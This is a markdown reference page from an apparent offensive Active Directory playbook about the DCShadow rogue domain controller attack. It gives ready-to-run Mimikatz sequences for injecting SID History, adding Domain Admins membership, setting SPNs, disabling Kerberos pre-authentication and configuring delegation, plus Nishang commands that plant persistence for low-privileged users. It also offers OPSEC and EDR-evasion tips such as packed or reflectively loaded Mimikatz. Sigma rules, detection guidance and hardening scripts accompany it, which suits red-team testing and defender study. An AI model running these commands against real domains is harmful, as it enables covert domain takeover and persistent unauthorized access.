attack-38-dcshadow-attack.md (25916B)
1 --- 2 title: "Attack #38 β DCShadow Attack" 3 description: "DCShadow allows an attacker to register a rogue Domain Controller in Active Directory and push malicious changes via the legitimate replication protocolβ¦" 4 category: active-directory 5 subcategory: "Domain Controller Attacks" 6 tags: ["active-directory", "credential-access"] 7 tools: ["Impacket", "Mimikatz", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/π΅ Attack #38 β DCShadow Attack.md" 11 --- 12 # π΅ Attack #38 β DCShadow Attack 13 14 *** 15 16 ## π How It Works 17 18 DCShadow allows an attacker to **register a rogue Domain Controller** in Active Directory and push malicious changes via the legitimate replication protocol. Unlike DCSync (which reads), DCShadow **writes** β it can modify any AD object (add users to groups, set SPNs, modify ACLs, inject SID History) while bypassing most security logs because changes appear as normal DC replication. 19 20 The attack was presented at [BlueHat IL 2018](https://www.dcshadow.com/) by Benjamin Delpy (Mimikatz author) and Vincent Le Toux. It works by temporarily registering the attacker's machine as a Domain Controller in Active Directory by creating the required objects in the Configuration partition β specifically an `nTDSDSA` object under `CN=Servers,CN=<Site>,CN=Sites,CN=Configuration` and the corresponding SPN entries (`E3514235-4B06-11D1-AB04-00C04FC2DCD2/<hostname>` for [MS-DRSR](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/) replication, and `GC/<hostname>` for Global Catalog). Once registered, the rogue DC pushes changes via `DrsReplicaAdd` to force legitimate DCs to pull replication data from the attacker β the changes then propagate across the entire forest as normal multi-master replication. 21 22 > [!info]+ Technical Deep-Dive β nTDSDSA Registration & Replication Push 23 > 1. **Phase 1 β DC Registration**: The SYSTEM-context Mimikatz instance creates an `nTDSDSA` object under `CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=corp,DC=local` β this is the object that defines a machine as a Domain Controller 24 > 2. **SPNs Added**: Two critical SPNs are set on the attacker's computer object: 25 > - `E3514235-4B06-11D1-AB04-00C04FC2DCD2/<attacker-hostname>/<domain>` (DRSUAPI replication SPN) 26 > - `GC/<attacker-hostname>/<domain>` (Global Catalog SPN) 27 > 3. **Phase 2 β Change Injection**: The attacker stages the desired AD modifications (attribute changes) in a local NTDS-like structure 28 > 4. **Phase 3 β Replication Push**: The DA-context Mimikatz instance calls `DrsReplicaAdd` to notify real DCs that the rogue DC has changes to replicate, triggering the **Knowledge Consistency Checker (KCC)** to initiate inbound replication from the attacker 29 > 5. **Phase 4 β Cleanup**: After replication completes, the `nTDSDSA` object and SPNs are removed β the rogue DC registration is temporary (seconds to minutes) 30 > 6. *Because changes arrive via replication, they are stamped with a USN and `originating_dsa_invocation_id` β standard AD forensics tools see them as legitimate replication events* 31 32 ### Key Difference: DCSync vs DCShadow 33 34 | Aspect | DCSync (Attack #37) | DCShadow | 35 |---|---|---| 36 | **Direction** | Read (pull credentials) | Write (push changes) | 37 | **Protocol Function** | `DRSGetNCChanges` (pull) | `DrsReplicaAdd` (push notification) | 38 | **Purpose** | Credential extraction | Persistence / stealthy modification | 39 | **Requirements** | Replication rights | Domain Admin + two Mimikatz instances | 40 | **Detection** | Event 4662 (well-documented) | Very difficult β appears as replication | 41 | **Artifacts** | Network only | Temporary nTDSDSA object + SPN changes | 42 43 *** 44 45 ## βοΈ Prerequisites 46 47 | Requirement | Detail | 48 |---|---| 49 | **Domain Admin** | Required to register a rogue DC (create nTDSDSA object in Configuration partition) | 50 | **Two Mimikatz instances** | One as SYSTEM (RPC server for replication), one as DA (push trigger) | 51 | **Local admin on a domain-joined machine** | Machine will be temporarily registered as a DC in AD | 52 | **Network access to real DCs** | RPC replication ports (TCP 135 + dynamic) must be reachable in both directions | 53 54 *** 55 56 ## π οΈ Tools 57 58 | Tool | Platform | Version | Notes | 59 |---|---|---|---| 60 | [Mimikatz](https://github.com/gentilkiwi/mimikatz) | Windows | β₯ 2.2.0 (Jan 2018+) | `lsadump::dcshadow` β the only full implementation | 61 | [SharpDCShadow](https://github.com/KevinJClark/SharpDCShadow) | Windows (.NET) | Proof-of-concept | .NET port for C2 `execute-assembly`; limited attribute support | 62 | [Set-DCShadowPermissions](https://github.com/samratashok/nishang) (Nishang) | Windows/PowerShell | Latest | Grants minimum DCShadow permissions to a non-DA user for persistence | 63 | [lsadump::dcshadow /stack](https://github.com/gentilkiwi/mimikatz) | Windows | β₯ 2.2.0 | Stack multiple attribute changes in a single replication push | 64 65 > [!tip]+ Tool Limitations 66 > `fas:Lightbulb` 67 > 1. DCShadow is **Mimikatz-only** in practice β no Impacket or Linux implementation exists because it requires running a local RPC server and registering the machine as a DC 68 > 2. The attack requires **two separate sessions** running simultaneously on the same machine β one elevated to SYSTEM, one with DA token 69 > 3. [SharpDCShadow](https://github.com/KevinJClark/SharpDCShadow) is a proof-of-concept with limited functionality β Mimikatz remains the authoritative implementation 70 > 4. *No remote execution possible β the attacker must have interactive/C2 access to the machine being registered as a rogue DC* 71 72 *** 73 74 ## β±οΈ Time-to-Execute Estimates 75 76 | Operation | Time | Notes | 77 |---|---|---| 78 | DC registration (nTDSDSA creation) | **5β15 seconds** | Depends on AD replication latency | 79 | Single attribute modification + push | **10β30 seconds** | Including registration, push, and cleanup | 80 | Multiple stacked changes (`/stack`) | **15β45 seconds** | Stack changes, single replication push | 81 | Full cleanup (nTDSDSA removal) | **5β10 seconds** | Automatic after `/push` completes | 82 83 *** 84 85 ## π» Full Commands 86 87 ### π΄ Basic DCShadow β Modify Single Attribute 88 89 ```powershell 90 # ββ Terminal 1: Run as SYSTEM β Start the rogue DC RPC server ββββββββββββββββ 91 mimikatz.exe 92 privilege::debug 93 !+ 94 !processtoken 95 lsadump::dcshadow /object:targetuser /attribute:primaryGroupID /value:512 96 # Registers machine as a temporary DC and prepares the change 97 # (primaryGroupID 512 = Domain Admins) 98 99 # ββ Terminal 2: Run as DA β Push the replication ββββββββββββββββββββββββββββββ 100 mimikatz.exe 101 privilege::debug 102 lsadump::dcshadow /push 103 # Forces replication of the change to real DCs 104 ``` 105 106 ### π΄ Useful Attribute Modifications 107 108 ```powershell 109 # ββ Add SID History (stealthy privilege escalation) ββββββββββββββββββββββββββ 110 # Terminal 1 (SYSTEM): 111 lsadump::dcshadow /object:targetuser /attribute:sidHistory /value:S-1-5-21-...-500 112 # Adds Enterprise Admin SID to sidHistory β user inherits EA privileges 113 # without being a member of the EA group 114 115 # ββ Modify SPN (set up for Kerberoasting β Attack #2) ββββββββββββββββββββββββ 116 # Terminal 1 (SYSTEM): 117 lsadump::dcshadow /object:targetuser /attribute:servicePrincipalName /value:MSSQLSvc/db01.corp.local:1433 118 # Makes the account Kerberoastable β request TGS and crack offline 119 120 # ββ Set AdminCount (bypass AdminSDHolder protection) ββββββββββββββββββββββββββ 121 # Terminal 1 (SYSTEM): 122 lsadump::dcshadow /object:targetuser /attribute:adminCount /value:1 123 # Marks user as admin β SDProp will apply AdminSDHolder DACL 124 125 # ββ Modify userAccountControl (disable pre-auth for AS-REP roasting) βββββββββ 126 # Terminal 1 (SYSTEM): 127 lsadump::dcshadow /object:targetuser /attribute:userAccountControl /value:4194304 128 # Sets DONT_REQ_PREAUTH flag β enables AS-REP Roasting (Attack #3) 129 130 # ββ Add member to group (e.g., add user to Domain Admins) ββββββββββββββββββββ 131 # Terminal 1 (SYSTEM): 132 lsadump::dcshadow /object:"CN=Domain Admins,CN=Users,DC=corp,DC=local" /attribute:member /value:"CN=targetuser,CN=Users,DC=corp,DC=local" 133 134 # ββ Modify msDS-AllowedToDelegateTo (configure delegation) βββββββββββββββββββ 135 # Terminal 1 (SYSTEM): 136 lsadump::dcshadow /object:svc_account /attribute:msDS-AllowedToDelegateTo /value:cifs/DC01.corp.local 137 # Sets constrained delegation β attacker can impersonate any user to cifs/DC01 138 139 # ALL of the above: Then run in Terminal 2 (DA): 140 # lsadump::dcshadow /push 141 ``` 142 143 ### π΄ Stacking Multiple Changes (Single Replication Push) 144 145 ```powershell 146 # ββ Terminal 1 (SYSTEM) β Stack multiple modifications βββββββββββββββββββββββ 147 lsadump::dcshadow /stack /object:targetuser /attribute:primaryGroupID /value:512 148 lsadump::dcshadow /stack /object:targetuser /attribute:sidHistory /value:S-1-5-21-...-519 149 lsadump::dcshadow /stack /object:targetuser /attribute:servicePrincipalName /value:fake/spn 150 # All three changes queued β pushed in a single replication cycle 151 152 # ββ Terminal 2 (DA) β Push all stacked changes at once βββββββββββββββββββββββ 153 lsadump::dcshadow /push 154 # Single replication event containing all three modifications 155 ``` 156 157 ### π΄ Grant DCShadow Permissions to Non-DA User (Persistence) 158 159 ```powershell 160 # ββ Using Nishang Set-DCShadowPermissions βββββββββββββββββββββββββββββββββββββ 161 Import-Module .\Set-DCShadowPermissions.ps1 162 163 # Grant minimum permissions for DCShadow to a low-priv user 164 Set-DCShadowPermissions -FakeDC YOURWORKSTATION -SamAccountName targetuser ` 165 -Username low_user -Verbose 166 167 # This grants: 168 # 1. Write access to nTDSDSA objects in the Configuration partition 169 # 2. Write access to the target computer object SPNs 170 # 3. Replication-related extended rights 171 # Now low_user can perform DCShadow without full DA privileges 172 ``` 173 174 ### π΅ Verify DCShadow Changes Took Effect 175 176 ```powershell 177 # ββ Check if primaryGroupID was changed βββββββββββββββββββββββββββββββββββββββ 178 Get-ADUser targetuser -Properties primaryGroupID, memberOf | Select-Object primaryGroupID, memberOf 179 180 # ββ Check SID History βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 181 Get-ADUser targetuser -Properties sidHistory | Select-Object -ExpandProperty sidHistory 182 183 # ββ Check replication metadata (which DC made the change) βββββββββββββββββββββ 184 repadmin /showobjmeta DC01 "CN=targetuser,CN=Users,DC=corp,DC=local" 185 # Look for originating DSA that doesn't match a real DC = DCShadow indicator 186 ``` 187 188 *** 189 190 ## π― OPSEC Tips 191 192 1. **DCShadow is the stealthiest AD modification technique** β changes arrive via the replication protocol and are indistinguishable from legitimate multi-master replication in most SIEM setups 193 2. **The nTDSDSA registration is temporary** β Mimikatz removes it after the push completes; if the tool crashes, manual cleanup is needed (`ntdsutil β metadata cleanup`) 194 3. **Changes bypass standard LDAP-based security logs** β Event IDs 4662/5136/5137 (directory service modification) are NOT generated because the change didn't come through LDAP; it came through replication 195 4. **Stack changes with `/stack`** to minimize the number of replication events β one push with 10 changes is stealthier than 10 separate pushes 196 5. **Use for persistence, not initial escalation** β you already need DA; DCShadow is for maintaining access and avoiding detection 197 6. **SID History injection is the most powerful DCShadow use case** β the user gets EA/DA privileges without group membership, which most auditing tools miss 198 7. **Time attacks during legitimate replication windows** β AD replicates every 15 minutes (intra-site) by default; pushing changes during expected replication windows reduces anomaly signals 199 200 ### π OpSec Ranking 201 202 | Modification Type | Stealth | Persistence Value | Detection Risk | Notes | 203 |---|---|---|---|---| 204 | SID History injection | π’ High | π’ High | π’ Low | Most tools don't audit sidHistory changes via replication | 205 | primaryGroupID change | π‘ Medium | π‘ Medium | π‘ Medium | Group membership changes may trigger membership audits | 206 | SPN modification | π’ High | π‘ Medium | π’ Low | Enables Kerberoasting; SPN changes rarely monitored | 207 | userAccountControl | π‘ Medium | π‘ Medium | π‘ Medium | Disabling pre-auth is suspicious if audited | 208 | Direct group member add | π΄ Low | π’ High | π΄ High | Most orgs monitor DA/EA group membership | 209 | msDS-AllowedToDelegateTo | π’ High | π’ High | π’ Low | Constrained delegation rarely audited | 210 211 *** 212 213 ## π‘οΈ Detection β Event IDs 214 215 | Event ID | Source | What to Look For | 216 |---|---|---| 217 | **4742** | Security Log (DC) | Computer account modified β `nTDSDSA` object created (rogue DC registration) | 218 | **4928/4929** | Security Log (DC) | Active Directory Replica Source Naming Context established/removed β rogue DC participating in replication | 219 | **4662** | Security Log (DC) | DS Access on Configuration partition objects (nTDSDSA creation) β requires DS Access auditing | 220 | **Metadata** | Replication | Changes originating from a non-DC source β check `repadmin /showmeta` for unknown `originating_dsa_invocation_id` | 221 222 > [!important]+ The Key Detection Challenge 223 > `fas:TriangleExclamation` 224 > 1. DCShadow changes **do NOT generate standard modification events** (5136/5137) because they arrive via replication, not LDAP 225 > 2. The primary detection vector is monitoring the **Configuration partition** for new `nTDSDSA` objects and SPN changes on computer accounts 226 > 3. Network-level detection (monitoring for `DrsReplicaAdd` RPC calls from non-DC IPs) is the most reliable method 227 > 4. *If your SIEM only monitors Security logs on DCs, DCShadow changes will be completely invisible* 228 229 ### π Sigma Rules 230 231 ```yaml 232 # ββ SigmaHQ β DCShadow (nTDSDSA Object Creation) ββββββββββββββββββββββββββββ 233 title: DCShadow β Rogue Domain Controller Registration 234 id: f3b4c644-4e5d-4e8f-9c3a-84f5c2c07e5c 235 status: experimental 236 logsource: 237 product: windows 238 service: security 239 detection: 240 selection: 241 EventID: 4742 242 keywords: 243 - 'nTDSDSA' 244 - 'E3514235-4B06-11D1-AB04-00C04FC2DCD2' 245 condition: selection and keywords 246 level: critical 247 tags: 248 - attack.defense_evasion 249 - attack.t1207 250 ``` 251 252 ```yaml 253 # ββ SigmaHQ β Replication Source Added from Non-DC βββββββββββββββββββββββββββ 254 title: Active Directory Replication from Non-DC Source 255 id: a1b2c3d4-rogue-dc-replication-monitor 256 logsource: 257 product: windows 258 service: security 259 detection: 260 selection: 261 EventID: 262 - 4928 263 - 4929 264 condition: selection 265 level: high 266 tags: 267 - attack.defense_evasion 268 - attack.t1207 269 ``` 270 271 ### π‘οΈ EDR-Specific Detections 272 273 > [!warning]+ Microsoft Defender for Identity (MDI) 274 > 1. **"Suspected DCShadow attack (domain controller promotion)"** β detects when a non-DC machine registers itself as a Domain Controller 275 > 2. **"Suspected DCShadow attack (domain controller replication request)"** β detects `DrsReplicaAdd` calls from non-DC machines 276 > 3. MDI monitors the Configuration partition in real-time for nTDSDSA object creation 277 > 4. *MDI is the most reliable DCShadow detection tool available β it has specific behavioral detections that SIEM rules alone cannot replicate* 278 279 > [!warning]+ CrowdStrike Falcon 280 > 1. **"DCShadow Activity Detected"** β monitors for Mimikatz `lsadump::dcshadow` behavioral patterns 281 > 2. Falcon detects the combination of SYSTEM token manipulation (`!processtoken`) + DRSUAPI RPC server registration 282 > 3. Process tree analysis flags the dual-Mimikatz pattern (two `mimikatz.exe` instances with different token contexts) 283 284 > [!warning]+ Elastic Security 285 > 1. Rule: **"Potential DCShadow Activity"** β monitors for nTDSDSA object creation events and SPN modifications containing the DRSUAPI UUID 286 > 2. Rule: **"Active Directory Replication from Anomalous Source"** β correlates replication traffic source IPs against known DC list 287 > 3. *Requires Windows Event Forwarding (WEF) of Configuration partition change events to Elasticsearch* 288 289 *** 290 291 ## π¬ Forensic Artifacts 292 293 | Artifact | Location | Details | 294 |---|---|---| 295 | **nTDSDSA object (transient)** | `CN=Servers,CN=<Site>,CN=Sites,CN=Configuration` | Created during attack, removed after `/push` β may be captured in AD snapshots or tombstoned objects | 296 | **SPN modifications** | Computer object in AD | `E3514235-4B06-11D1-AB04-00C04FC2DCD2/<hostname>` SPN temporarily added; check `msDS-ReplAttributeMetaData` for modification timestamps | 297 | **Replication metadata** | `repadmin /showmeta` on modified objects | `originating_dsa_invocation_id` will reference the rogue DC's invocation ID β this ID won't match any real DC | 298 | **Event 4742** | DC Security Log | Computer account modification for SPN changes; look for DRSUAPI-related SPNs being added then quickly removed | 299 | **Event 4928/4929** | DC Security Log | Replication source naming context established from non-DC β definitive DCShadow indicator if captured | 300 | **USN journal** | NTDS.dit `msDS-ReplAttributeMetaData` | Each replicated change has a USN with the originating DC β unknown DC = DCShadow | 301 | **Tombstone objects** | AD Recycle Bin | If enabled, the deleted nTDSDSA object may be recoverable for 180 days (default tombstone lifetime) | 302 303 *** 304 305 > [!important]+ Windows Server Version Differences 306 > 1. **Server 2012 R2**: DCShadow works without additional obstacles; minimal replication monitoring by default 307 > 2. **Server 2016+**: Windows Defender Credential Guard does NOT prevent DCShadow (it doesn't interact with LSASS or local credentials) 308 > 3. **Server 2019**: No new DCShadow-specific mitigations; MDI deployment is the primary recommendation 309 > 4. **Server 2022**: Microsoft added enhanced replication logging capabilities, but they require explicit configuration 310 > 5. **Server 2025**: Improved Configuration partition change auditing β `nTDSDSA` object creation generates additional telemetry when Advanced Audit Policy is configured 311 > 6. *DCShadow remains effective on all Windows Server versions β the mitigation is monitoring, not a technical patch* 312 313 *** 314 315 ## π Hardening & Prevention 316 317 ```powershell 318 # ββ 1. Monitor Configuration partition for nTDSDSA object changes βββββββββββββ 319 # Enable auditing on the Sites container in Configuration partition 320 $sitesPath = "AD:CN=Sites,CN=Configuration,DC=corp,DC=local" 321 $acl = Get-Acl $sitesPath 322 # Add SACL for Write access β generates Event 4662 on nTDSDSA creation 323 324 # ββ 2. Enable Advanced Audit Policy β DS Access ββββββββββββββββββββββββββββββ 325 auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable 326 auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable 327 auditpol /set /subcategory:"Detailed Directory Service Replication" /success:enable 328 329 # ββ 3. Monitor SPN changes on computer accounts ββββββββββββββββββββββββββββββ 330 # GPO β Computer Configuration β Windows Settings β Security Settings β 331 # Advanced Audit Policy Configuration β DS Access β 332 # β Audit Directory Service Changes: Success 333 # Alert on SPNs containing "E3514235-4B06-11D1-AB04-00C04FC2DCD2" being added to non-DC accounts 334 335 # ββ 4. Deploy MDI sensors on ALL Domain Controllers ββββββββββββββββββββββββββ 336 # MDI is the single most effective DCShadow detection tool 337 # https://learn.microsoft.com/en-us/defender-for-identity/ 338 339 # ββ 5. Restrict who can modify the Configuration partition ββββββββββββββββββββ 340 # By default, only Enterprise Admins and Domain Admins can create objects here 341 # Audit and minimize membership in these groups 342 343 # ββ 6. Enable AD Recycle Bin (capture deleted nTDSDSA objects) ββββββββββββββββ 344 Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=corp,DC=local' ` 345 -Scope ForestOrConfigurationSet -Target 'corp.local' -Confirm:$false 346 347 # ββ 7. Regularly audit replication metadata βββββββββββββββββββββββββββββββββββ 348 # Script to check for unknown originating DSAs across all user objects: 349 $dcs = (Get-ADDomainController -Filter *).Name 350 Get-ADUser -Filter * -Properties msDS-ReplAttributeMetaData | 351 ForEach-Object { 352 $meta = $_.'msDS-ReplAttributeMetaData' | ConvertFrom-ADMetadata 353 $meta | Where-Object { $_.LastOriginatingDsaDN -notmatch ($dcs -join '|') } 354 } 355 356 # ββ 8. Network-level replication monitoring βββββββββββββββββββββββββββββββββββ 357 # Deploy Zeek/Bro or network TAP to monitor DRSUAPI traffic 358 # Alert on DrsReplicaAdd calls from non-DC IP addresses 359 ``` 360 361 *** 362 363 ## π§© Troubleshooting 364 365 | Error | Cause | Fix | 366 |---|---|---| 367 | `ERROR kuhl_m_lsadump_dcshadow_domain_info` | Cannot find domain information; machine may not be domain-joined | Verify machine is domain-joined (`systeminfo \| findstr Domain`); ensure DNS resolves the DC FQDN | 368 | Terminal 1 hangs on "RPC server waiting" | Firewall blocking inbound RPC on the attacker machine | Ensure Windows Firewall allows inbound TCP 135 + dynamic RPC ports on the machine running Terminal 1 | 369 | `/push` returns "Error 0x2105" (ACCESS_DENIED) | Terminal 2 is not running as DA or the token is wrong | Verify DA token: `whoami /groups` should show Domain Admins; use `token::elevate /domainadmin` if needed | 370 | Changes don't appear on other DCs | Replication push succeeded to one DC but inter-site replication is slow | Run `repadmin /syncall /AeD` on the target DC to force replication to all partners | 371 | nTDSDSA object not cleaned up | Mimikatz crashed before cleanup; rogue DC still registered | Manual cleanup: `ntdsutil β metadata cleanup β remove selected server`; or delete the object via ADSIEdit | 372 | "SYSTEM token required" error | Terminal 1 not running as SYSTEM (`!+` / `!processtoken` failed) | Use `psexec -s -i cmd.exe` to get a SYSTEM shell, then run Mimikatz from there | 373 | SID History injection fails | Target account has adminCount=1 (SDProp resets the ACL) | Modify sidHistory on non-protected accounts, or clear adminCount first via a separate DCShadow push | 374 | AV/EDR blocks Mimikatz execution | Defender or EDR detects mimikatz.exe on disk | Use reflective PE loading (e.g., `Invoke-Mimikatz`), packed variants, or execute from C2 via `execute-assembly` with SharpDCShadow | 375 376 *** 377 378 ## πΊοΈ MITRE ATT&CK 379 380 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups | 381 |---|---|---|---|---| 382 | **Defense Evasion** | [T1207](https://attack.mitre.org/techniques/T1207/) | Rogue Domain Controller | Register rogue DC via nTDSDSA, push malicious replication changes that bypass standard logging | Technique is public since 2018; no specific APT attribution yet | 383 | **Persistence** | [T1098](https://attack.mitre.org/techniques/T1098/) | Account Manipulation | Inject SID History, modify group membership, or change delegation settings via replication | Red team operations and advanced persistent threats | 384 | **Privilege Escalation** | [T1134](https://attack.mitre.org/techniques/T1134/) | [.005 β SID-History Injection](https://attack.mitre.org/techniques/T1134/005/) | Use DCShadow to inject Enterprise Admin SID into a low-priv user's sidHistory attribute | Demonstrated in red team operations | 385 386 > [!tip]+ Real-World Context 387 > `fas:Lightbulb` 388 > 1. DCShadow is primarily a **red team / advanced attacker technique** β it requires DA access, making it a persistence/defense evasion tool rather than an escalation vector 389 > 2. No public APT attribution exists as of 2025, but the technique is available to any adversary with DA-level access 390 > 3. **Purple team value**: DCShadow is an excellent test for validating MDI deployment and replication monitoring capabilities 391 > 4. *The fact that DCShadow has no public APT usage doesn't mean it's not used β it means it's difficult to detect and attribute* 392 393 *** 394 395 ## π Attack Chain Context 396 397 ``` 398 [DCShadow] βββ Stealthy AD Modifications via Fake DC Replication 399 β 400 ββββ π Push changes that appear as legitimate replication 401 ββββ π Requires DA β used for persistence, not initial escalation 402 ββββ π SID History injection β invisible privilege escalation (Attack #65) 403 ββββ π― SPN modification β set up Kerberoasting (Attack #2) 404 ββββ π Disable pre-auth β set up AS-REP Roasting (Attack #3) 405 ββββ π Related: DCSync (Attack #37) reads; DCShadow writes 406 ββββ π Delegation abuse via msDS-AllowedToDelegateTo (Attack #16) 407 ββββ π» Requires Mimikatz on a domain-joined workstation 408 ββββ π Defeated by: MDI, monitor Configuration partition, replication metadata auditing, AD Recycle Bin 409 ``` 410 411 *** 412 413 > β **Attack #38 β DCShadow complete.**